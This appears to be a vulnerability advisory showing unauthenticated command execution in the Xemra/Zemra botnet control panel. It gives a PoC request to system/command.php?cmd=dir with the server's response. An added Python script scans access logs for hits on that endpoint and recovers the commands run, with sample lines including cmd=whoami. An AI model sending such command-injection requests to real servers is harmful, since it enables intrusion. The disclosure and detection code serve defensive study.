##########################################################################
# Exploit Title: Xemra Botnet Remote Code Execution Vulnerability
# Date: 13.12.2013
# Exploit Author: GalaxyAndroid
# Vendor Homepage: unkn0wn
# Software Link: http://www.hackreports.com/2012/07/download-zemra-botnet-ddos-attack.html
# Version: unknown
# Tested on: Windows 7 with Xampp
# greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing!
# no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL
#################################Exploit-Code###################################

PoC: executes the dir command. No authentication needed!

#########
GET http://127.0.0.1/xemra/system/command.php?cmd=dir HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cache-Control: max-age=0
############

Response:

HTTP/1.1 200 OK
Date: Fri, 13 Dec 2013 18:29:42 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 685

<h1>cmd</h1><pre>
 Datenträger in Laufwerk C: ist
 Verzeichnis von C:\xampp\htdocs\xemra\system

13.12.2013  19:16    <DIR>          .
13.12.2013  19:16    <DIR>          ..
18.04.2012  22:09               646 base.class.php
26.11.2011  13:47                88 command.php
18.05.2012  08:11               277 config.include.php
18.04.2012  22:09             1.348 database.class.php
13.12.2013  19:16    <DIR>          geoip
18.04.2012  22:09               694 global.php
18.04.2012  22:09             1.725 session.class.php
               6 Datei(en),          4.778 Bytes
               3 Verzeichnis(se), 66.773.762.048 Bytes frei
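Added example, not part of the advisory above: a small detector that scans Apache combined-format access logs for hits on the panel's unauthenticated system/command.php endpoint and recovers the value of the cmd parameter, so a responder examining a server that hosted this panel can see what was run through it. The log lines are constructed; the path and parameter name come from the request shown above.

```python
# Flags requests to the Xemra/Zemra panel's system/command.php endpoint in
# Apache combined-format access logs and extracts the cmd= value that the
# endpoint executes without authentication.
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: client, identd, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log; IPs are documentation ranges, not real clients.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2013:18:29:42 +0100] "GET /xemra/system/command.php?cmd=dir HTTP/1.1" 200 685
198.51.100.7 - - [13/Dec/2013:18:30:10 +0100] "GET /xemra/index.php HTTP/1.1" 200 1234
203.0.113.5 - - [13/Dec/2013:18:31:02 +0100] "GET /xemra/system/command.php?cmd=whoami HTTP/1.1" 200 120
203.0.113.5 - - [13/Dec/2013:18:32:15 +0100] "GET /xemra/system/command.php HTTP/1.1" 200 20
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_command_exec(log_text):
    """Return (client_ip, timestamp, command) for every hit on system/command.php.

    A request that reaches the endpoint without a cmd parameter is still
    reported (with an empty command): touching it at all is worth a look.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.lower().endswith("/system/command.php"):
            continue
        # parse_qs percent-decodes values, so "type%20x" comes back as "type x"
        cmds = parse_qs(parts.query).get("cmd", [])
        hits.append((rec["ip"], rec["ts"], cmds[0] if cmds else ""))
    return hits


if __name__ == "__main__":
    for ip, ts, cmd in find_command_exec(SAMPLE_LOG):
        print(f"{ts} {ip} command.php cmd={cmd!r}")
```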